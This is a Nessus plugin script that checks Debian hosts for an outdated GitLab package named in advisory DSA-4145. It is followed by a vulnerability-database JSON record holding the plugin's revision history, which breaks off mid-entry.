ID DEBIAN_DSA-4145.NASL Type nessus Reporter This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2019-12-02T00:00:00
Description
Several vulnerabilities have been discovered in GitLab, a software
platform to collaborate on code:
CVE-2017-0915 / CVE-2018-3710
Arbitrary code execution in project import.
CVE-2017-0916
Command injection via Webhooks.
CVE-2017-0917
Cross-site scripting in CI job output.
CVE-2017-0918
Insufficient restriction of CI runner for project cache
access.
CVE-2017-0925
Information disclosure in Services API.
CVE-2017-0926
Restrictions for disabled OAuth providers could be
bypassed.
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-4145. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
include("compat.inc");
# Description pass: registers the plugin's metadata (identifiers, advisory
# text, references, severity, dependencies) and then exits, so none of the
# check logic further down runs during this pass.
if (description)
{
  # Plugin identity and revision information.
  script_id(108422);
  script_version("1.6");
  script_cvs_date("Date: 2018/11/13 12:30:46");

  # Every CVE covered by the advisory, plus the DSA cross-reference.
  script_cve_id("CVE-2017-0915", "CVE-2017-0916", "CVE-2017-0917", "CVE-2017-0918", "CVE-2017-0925", "CVE-2017-0926", "CVE-2018-3710");
  script_xref(name:"DSA", value:"4145");

  script_name(english:"Debian DSA-4145-1 : gitlab - security update");
  # The summary states the detection method: package-list comparison, not a
  # probe of the running service.
  script_summary(english:"Checks dpkg output for the updated package");

  script_set_attribute(attribute:"synopsis", value:"The remote Debian host is missing a security-related update.");

  # Advisory text; the string literal is kept exactly as published.
  script_set_attribute(attribute:"description", value:
"Several vulnerabilities have been discovered in Gitlab, a software
platform to collaborate on code :
- CVE-2017-0915/ CVE-2018-3710
Arbitrary code execution in project import.
- CVE-2017-0916
Command injection via Webhooks.
- CVE-2017-0917
Cross-site scripting in CI job output.
- CVE-2017-0918
Insufficient restriction of CI runner for project cache
access.
- CVE-2017-0925
Information disclosure in Services API.
- CVE-2017-0926
Restrictions for disabled OAuth providers could be
bypassed.");

  # References: one Debian security-tracker entry per CVE, then the source
  # package pages and the advisory itself.
  script_set_attribute(attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2017-0915");
  script_set_attribute(attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2018-3710");
  script_set_attribute(attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2017-0916");
  script_set_attribute(attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2017-0917");
  script_set_attribute(attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2017-0918");
  script_set_attribute(attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2017-0925");
  script_set_attribute(attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2017-0926");
  script_set_attribute(attribute:"see_also", value:"https://security-tracker.debian.org/tracker/source-package/gitlab");
  script_set_attribute(attribute:"see_also", value:"https://packages.debian.org/source/stretch/gitlab");
  script_set_attribute(attribute:"see_also", value:"https://www.debian.org/security/2018/dsa-4145");

  # Remediation text names the fixed package version for stretch; the same
  # version string is the reference used by the package check below.
  script_set_attribute(attribute:"solution", value:
"Upgrade the gitlab packages.
For the stable distribution (stretch), these problems have been fixed
in version 8.13.11+dfsg1-8+deb9u1.");

  # One CVSS v2 and one CVSS v3.0 base vector are registered for the whole
  # advisory (seven CVEs), not one per CVE. Both describe a network-reachable,
  # low-complexity issue needing no authentication or privileges.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");

  # "local" plugin type: the result depends on data collected from the host
  # itself (see the required KB keys below).
  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:gitlab");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:9.0");

  script_set_attribute(attribute:"patch_publication_date", value:"2018/03/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2018/03/19");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Debian Local Security Checks");

  # Depends on ssh_get_info.nasl and on the KB entries for local checks,
  # the Debian release and the dpkg package list being present.
  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");

  exit(0);
}
include("audit.inc");
include("debian_package.inc");
# Preconditions: each audit() call passes the reason the check cannot be
# evaluated (local checks disabled, host not Debian, no dpkg package list).
if (!get_kb_item("Host/local_checks_enabled"))
{
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
}
if (!get_kb_item("Host/Debian/release"))
{
  audit(AUDIT_OS_NOT, "Debian");
}
if (!get_kb_item("Host/Debian/dpkg-l"))
{
  audit(AUDIT_PACKAGE_LIST_MISSING);
}

# Package check: Debian 9.0, package prefix "gitlab", and the fixed version
# from the advisory as the reference. A true result marks the host affected.
# NOTE(review): presumably deb_check() flags installed versions older than
# the reference -- confirm against debian_package.inc.
flag = 0;
if (deb_check(release:"9.0", prefix:"gitlab", reference:"8.13.11+dfsg1-8+deb9u1"))
{
  flag++;
}

if (flag)
{
  # At non-zero verbosity the finding carries the text built by
  # deb_report_get(); otherwise it is reported without extra detail.
  if (report_verbosity > 0)
  {
    security_hole(port:0, extra:deb_report_get());
  }
  else
  {
    security_hole(0);
  }
  exit(0);
}
else
{
  # No package matched: record the host as not affected.
  audit(AUDIT_HOST_NOT, "affected");
}
{"id": "DEBIAN_DSA-4145.NASL", "bulletinFamily": "scanner", "title": "Debian DSA-4145-1 : gitlab - security update", "description": "Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.", "published": "2018-03-19T00:00:00", "modified": "2019-12-02T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/108422", "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://security-tracker.debian.org/tracker/source-package/gitlab", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "type": "nessus", "lastseen": "2019-12-13T06:53:31", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", 
"CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.", "edition": 13, "enchantments": {"dependencies": {"modified": "2019-11-01T02:22:26", "references": [{"idList": ["DEBIAN:DSA-4145-1:42E35"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310704145"], "type": "openvas"}, {"idList": ["65FAB89F-2231-46DB-8541-978F4E87F32A"], "type": "freebsd"}, {"idList": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "type": "cve"}, {"idList": ["FREEBSD_PKG_65FAB89F223146DB8541978F4E87F32A.NASL"], "type": "nessus"}, {"idList": ["H1:301432", "H1:299473", "H1:298873"], "type": "hackerone"}]}, "score": {"modified": "2019-11-01T02:22:26", "value": 6.8, "vector": "NONE"}}, "hash": "b9199df739d0e729369e425a861fa160faa4d106a09ac81053ff35dd480e087c", "hashmap": [{"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "94e682f572219e238e994f47a76a97b6", "key": "description"}, {"hash": "abcf9266f425f12dda38f529cd4a94bc", "key": "modified"}, {"hash": "205fa18cac3fc8ebbd32824afb096581", "key": "reporter"}, {"hash": "a088969e3ffa3a71ffb3ea0f49ec5460", "key": "references"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "e88870015da22affb99f52db5769bb53", "key": "href"}, {"hash": "dad3bf4df09046812026f13c33e8f983", "key": "sourceData"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": 
"title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2019-11-01T02:22:26", "modified": "2019-11-02T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["https://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://security-tracker.debian.org/tracker/source-package/gitlab", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 4}, "differentElements": ["modified"], "edition": 13, "lastseen": "2019-11-01T02:22:26"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software platform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710 Arbitrary code execution in project import.\n\n - CVE-2017-0916 Command injection via Webhooks.\n\n - CVE-2017-0917 Cross-site scripting in CI job output.\n\n - CVE-2017-0918 Insufficient restriction of CI runner for project cache access.\n\n - CVE-2017-0925 Information disclosure in Services API.\n\n - CVE-2017-0926 Restrictions for disabled OAuth providers could be bypassed.", "edition": 5, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, 
"hash": "9c5c1ae0ef6ea3147a465da55a49b0963a3870bf0cedf8ab92939a03de79792f", "hashmap": [{"hash": "6345a07519080def10bf765f22c5b146", "key": "description"}, {"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "5ba3c9d875bfe1d4088cbfd233ef0c85", "key": "modified"}, {"hash": "d0083786fa4896023b7e89b86eaea16e", "key": "sourceData"}, {"hash": "6b7d85728983a5229fdfdc41c6b30a78", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "ceec059fe53d22b2aa62a742623bc8e1", "key": "href"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2018-04-19T00:13:26", "modified": "2018-04-18T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["http://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "Tenable", 
"sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2018/04/18 11:50:33\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2018/dsa-4145\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the gitlab packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 8.13.11+dfsg1-8+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:gitlab\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 
(!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"gitlab\", reference:\"8.13.11+dfsg1-8+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "Debian DSA-4145-1 : gitlab - security update", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-04-19T00:13:26"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:debian:debian_linux:gitlab", "cpe:/o:debian:debian_linux:9.0"], "cvelist": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "description": "Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.", "edition": 12, "enchantments": {"dependencies": {"modified": "2019-10-28T20:07:08", "references": [{"idList": ["DEBIAN:DSA-4145-1:42E35"], "type": "debian"}, {"idList": ["OPENVAS:1361412562310704145"], "type": "openvas"}, {"idList": ["65FAB89F-2231-46DB-8541-978F4E87F32A"], "type": "freebsd"}, {"idList": ["CVE-2017-0917", "CVE-2017-0915", "CVE-2018-3710", "CVE-2017-0916", "CVE-2017-0926", "CVE-2017-0925", "CVE-2017-0918"], "type": "cve"}, {"idList": ["FREEBSD_PKG_65FAB89F223146DB8541978F4E87F32A.NASL"], 
"type": "nessus"}, {"idList": ["H1:301432", "H1:299473", "H1:298873"], "type": "hackerone"}]}, "score": {"modified": "2019-10-28T20:07:08", "value": 6.8, "vector": "NONE"}}, "hash": "78b4453871ba50169ca3e967e6abeeb77bedd721faef9d98184a4323c41abfc2", "hashmap": [{"hash": "353d91f2df442080de42f503ab3f278a", "key": "pluginID"}, {"hash": "94e682f572219e238e994f47a76a97b6", "key": "description"}, {"hash": "205fa18cac3fc8ebbd32824afb096581", "key": "reporter"}, {"hash": "a088969e3ffa3a71ffb3ea0f49ec5460", "key": "references"}, {"hash": "fa07a5338e88503fd255af6837f9bb02", "key": "cvelist"}, {"hash": "e88870015da22affb99f52db5769bb53", "key": "href"}, {"hash": "dad3bf4df09046812026f13c33e8f983", "key": "sourceData"}, {"hash": "b5f4279a86e8ad7e7d5cdcfce85f13b7", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "3f9580fb30f5ae7e1d8713dad8807aa6", "key": "cpe"}, {"hash": "0b053db5674b87efff89989a8a720df3", "key": "cvss"}, {"hash": "76e8782b29cfd39782ffd31ec97c3583", "key": "published"}, {"hash": "74562d71b087df9eabd0c21f99b132cc", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/108422", "id": "DEBIAN_DSA-4145.NASL", "lastseen": "2019-10-28T20:07:08", "modified": "2019-10-02T00:00:00", "naslFamily": "Debian Local Security Checks", "objectVersion": "1.3", "pluginID": "108422", "published": "2018-03-19T00:00:00", "references": ["https://www.debian.org/security/2018/dsa-4145", "https://security-tracker.debian.org/tracker/CVE-2018-3710", "https://security-tracker.debian.org/tracker/CVE-2017-0925", "https://security-tracker.debian.org/tracker/CVE-2017-0918", "https://security-tracker.debian.org/tracker/CVE-2017-0926", "https://security-tracker.debian.org/tracker/CVE-2017-0916", "https://security-tracker.debian.org/tracker/source-package/gitlab", 
"https://packages.debian.org/source/stretch/gitlab", "https://security-tracker.debian.org/tracker/CVE-2017-0915", "https://security-tracker.debian.org/tracker/CVE-2017-0917"], "reporter": "This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4145. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(108422);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/11/13 12:30:46\");\n\n script_cve_id(\"CVE-2017-0915\", \"CVE-2017-0916\", \"CVE-2017-0917\", \"CVE-2017-0918\", \"CVE-2017-0925\", \"CVE-2017-0926\", \"CVE-2018-3710\");\n script_xref(name:\"DSA\", value:\"4145\");\n\n script_name(english:\"Debian DSA-4145-1 : gitlab - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in Gitlab, a software\nplatform to collaborate on code :\n\n - CVE-2017-0915/ CVE-2018-3710\n Arbitrary code execution in project import.\n\n - CVE-2017-0916\n Command injection via Webhooks.\n\n - CVE-2017-0917\n Cross-site scripting in CI job output.\n\n - CVE-2017-0918\n Insufficient restriction of CI runner for project cache\n access.\n\n - CVE-2017-0925\n Information disclosure in Services API.\n\n - CVE-2017-0926\n Restrictions for disabled OAuth providers could be\n bypassed.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://security-tracker.debian.org/tracker/CVE-2018-3710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0916\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0917\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0925\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2017-0926\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/gitlab\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 